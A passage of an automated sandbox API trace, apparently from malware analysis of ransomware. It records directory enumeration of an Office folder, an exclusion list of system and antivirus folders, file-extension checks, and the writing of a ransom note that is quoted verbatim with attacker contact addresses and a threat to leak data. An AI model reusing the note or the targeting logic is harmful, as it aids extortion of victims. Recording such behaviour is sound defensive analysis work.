lpString2="..") returned 1 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="tmp") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="winnt") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="temp") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="thumb") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="$Recycle.Bin") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="System Volume Information") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="Boot") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="Windows") returned 0x0 [0137.659] StrStrIW (lpFirst="AS OLEDB", lpSrch="Trend Micro") returned 0x0 [0137.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0137.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0137.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0137.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xedab30 [0137.659] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0137.660] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0137.660] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2dd8 | out: hHeap=0xea0000) returned 1 [0137.660] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0137.660] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee410 [0137.660] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0137.660] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb74e3c10, ftCreationTime.dwHighDateTime=0x1d5e708, ftLastAccessTime.dwLowDateTime=0x1c21d640, ftLastAccessTime.dwHighDateTime=0x1d55f11, ftLastWriteTime.dwLowDateTime=0x1c21d640, ftLastWriteTime.dwHighDateTime=0x1d55f11, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="drum.exe", cAlternateFileName="")) returned 1 [0137.660] lstrcmpW (lpString1="drum.exe", lpString2=".") returned 1 [0137.660] lstrcmpW (lpString1="drum.exe", lpString2="..") returned 1 [0137.660] StrStrIW (lpFirst="drum.exe", lpSrch=".UAKXC") returned 0x0 [0137.660] StrStrIW (lpFirst="drum.exe", lpSrch=".exe") returned=".exe" [0137.660] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57c394b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57c394b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57c394b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.660] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.660] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.660] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.660] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.660] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.660] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.660] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.660] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.660] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.660] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c026a0, ftCreationTime.dwHighDateTime=0x1d5ada7, ftLastAccessTime.dwLowDateTime=0xff6dc470, ftLastAccessTime.dwHighDateTime=0x1d59d61, ftLastWriteTime.dwLowDateTime=0xff6dc470, ftLastWriteTime.dwHighDateTime=0x1d59d61, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="utg2.exe", cAlternateFileName="")) returned 1 [0137.660] lstrcmpW (lpString1="utg2.exe", lpString2=".") returned 1 [0137.660] lstrcmpW (lpString1="utg2.exe", lpString2="..") returned 1 [0137.660] StrStrIW (lpFirst="utg2.exe", lpSrch=".UAKXC") returned 0x0 [0137.661] StrStrIW (lpFirst="utg2.exe", lpSrch=".exe") returned=".exe" [0137.661] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c026a0, ftCreationTime.dwHighDateTime=0x1d5ada7, ftLastAccessTime.dwLowDateTime=0xff6dc470, ftLastAccessTime.dwHighDateTime=0x1d59d61, ftLastWriteTime.dwLowDateTime=0xff6dc470, ftLastWriteTime.dwHighDateTime=0x1d59d61, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="utg2.exe", cAlternateFileName="")) returned 0 [0137.661] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeccf70 | out: hHeap=0xea0000) returned 1 [0137.661] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d10 | out: hHeap=0xea0000) returned 1 [0137.661] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.661] Sleep (dwMilliseconds=0x32) [0137.717] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0137.717] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0137.717] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec31e0 [0137.717] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0137.717] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3028 [0137.717] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0137.717] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0137.717] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d10 [0137.717] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.717] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.717] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.717] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.717] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.717] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d10 | out: hHeap=0xea0000) returned 1 [0137.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft office\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.718] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.718] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.719] CloseHandle (hObject=0x6c4) returned 1 [0137.719] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.719] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0137.719] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x57cd1a30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57cd1a30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.719] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.719] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x57cd1a30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57cd1a30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.719] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.720] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.720] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0137.720] lstrcmpW (lpString1="CLIPART", lpString2=".") returned 1 [0137.720] lstrcmpW (lpString1="CLIPART", lpString2="..") returned 1 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="tmp") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="winnt") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="temp") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="thumb") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="$Recycle.Bin") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="System Volume Information") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="Boot") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="Windows") returned 0x0 [0137.720] StrStrIW (lpFirst="CLIPART", lpSrch="Trend Micro") returned 0x0 [0137.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0137.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.720] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.720] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0137.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d10 [0137.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0137.720] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.720] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x275fb7d0, ftCreationTime.dwHighDateTime=0x1d5c4a5, ftLastAccessTime.dwLowDateTime=0x24998f30, ftLastAccessTime.dwHighDateTime=0x1d564fb, ftLastWriteTime.dwLowDateTime=0x24998f30, ftLastWriteTime.dwHighDateTime=0x1d564fb, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="developer-picks-fossil.exe", cAlternateFileName="DEVELO~1.EXE")) returned 1 [0137.720] lstrcmpW (lpString1="developer-picks-fossil.exe", lpString2=".") returned 1 [0137.720] lstrcmpW (lpString1="developer-picks-fossil.exe", lpString2="..") returned 1 [0137.720] StrStrIW (lpFirst="developer-picks-fossil.exe", lpSrch=".UAKXC") returned 0x0 [0137.720] StrStrIW (lpFirst="developer-picks-fossil.exe", lpSrch=".exe") returned=".exe" [0137.720] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5cd5260, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes 14", cAlternateFileName="DOCUME~1")) returned 1 [0137.720] lstrcmpW (lpString1="Document Themes 14", lpString2=".") returned 1 [0137.720] lstrcmpW (lpString1="Document Themes 14", lpString2="..") returned 1 [0137.720] StrStrIW (lpFirst="Document Themes 14", lpSrch="tmp") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="winnt") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="temp") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="thumb") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="$Recycle.Bin") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="System Volume Information") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="Boot") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="Windows") returned 0x0 [0137.721] StrStrIW (lpFirst="Document Themes 14", lpSrch="Trend Micro") returned 0x0 [0137.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0137.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.721] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.721] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0137.721] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0137.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeccf70 [0137.721] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.721] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MEDIA", cAlternateFileName="")) returned 1 [0137.721] lstrcmpW (lpString1="MEDIA", lpString2=".") returned 1 [0137.721] lstrcmpW (lpString1="MEDIA", lpString2="..") returned 1 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="tmp") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="winnt") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="temp") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="thumb") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="$Recycle.Bin") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="System Volume Information") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="Boot") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="Windows") returned 0x0 [0137.721] StrStrIW (lpFirst="MEDIA", lpSrch="Trend Micro") returned 0x0 [0137.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.722] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0137.722] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.722] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5db9aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5db9aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office14", cAlternateFileName="")) returned 1 [0137.722] lstrcmpW (lpString1="Office14", lpString2=".") returned 1 [0137.722] lstrcmpW (lpString1="Office14", lpString2="..") returned 1 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="tmp") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="winnt") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="temp") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="thumb") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="$Recycle.Bin") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="System Volume Information") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="Boot") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="Windows") returned 0x0 [0137.722] StrStrIW (lpFirst="Office14", lpSrch="Trend Micro") returned 0x0 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ef0 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.722] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.722] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.722] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ef0 | out: hHeap=0xea0000) returned 1 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ef0 [0137.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0137.722] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.722] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6e14830, ftCreationTime.dwHighDateTime=0x1d5af64, ftLastAccessTime.dwLowDateTime=0x8c689570, ftLastAccessTime.dwHighDateTime=0x1d5dfd5, ftLastWriteTime.dwLowDateTime=0x8c689570, ftLastWriteTime.dwHighDateTime=0x1d5dfd5, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="paragraphs_referral_included.exe", cAlternateFileName="PARAGR~1.EXE")) returned 1 [0137.722] lstrcmpW (lpString1="paragraphs_referral_included.exe", lpString2=".") returned 1 [0137.722] lstrcmpW (lpString1="paragraphs_referral_included.exe", lpString2="..") returned 1 [0137.723] StrStrIW (lpFirst="paragraphs_referral_included.exe", lpSrch=".UAKXC") returned 0x0 [0137.723] StrStrIW (lpFirst="paragraphs_referral_included.exe", lpSrch=".exe") returned=".exe" [0137.723] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57cd1a30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57cd1a30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57cd1a30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.723] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.723] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.723] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b1b5d0, ftCreationTime.dwHighDateTime=0x1d5b954, ftLastAccessTime.dwLowDateTime=0x3f38a310, ftLastAccessTime.dwHighDateTime=0x1d5a5f3, ftLastWriteTime.dwLowDateTime=0x3f38a310, ftLastWriteTime.dwHighDateTime=0x1d5a5f3, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="scriptftp.exe", cAlternateFileName="SCRIPT~1.EXE")) returned 1 [0137.723] lstrcmpW (lpString1="scriptftp.exe", lpString2=".") returned 1 [0137.723] lstrcmpW (lpString1="scriptftp.exe", lpString2="..") returned 1 [0137.723] StrStrIW (lpFirst="scriptftp.exe", lpSrch=".UAKXC") returned 0x0 [0137.723] StrStrIW (lpFirst="scriptftp.exe", lpSrch=".exe") returned=".exe" [0137.723] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xebb910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0137.723] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0137.723] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="tmp") returned 0x0 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="winnt") returned 0x0 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="temp") returned 0x0 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="thumb") returned 0x0 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="$Recycle.Bin") returned 0x0 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="System Volume Information") returned 0x0 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="Boot") returned 0x0 [0137.723] StrStrIW (lpFirst="Stationery", lpSrch="Windows") returned 0x0 [0137.724] StrStrIW (lpFirst="Stationery", lpSrch="Trend Micro") returned 0x0 [0137.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd88 [0137.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.724] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.724] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.724] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd88 | out: hHeap=0xea0000) returned 1 [0137.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd88 [0137.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0137.724] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.724] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0137.724] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0137.724] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0137.724] StrStrIW 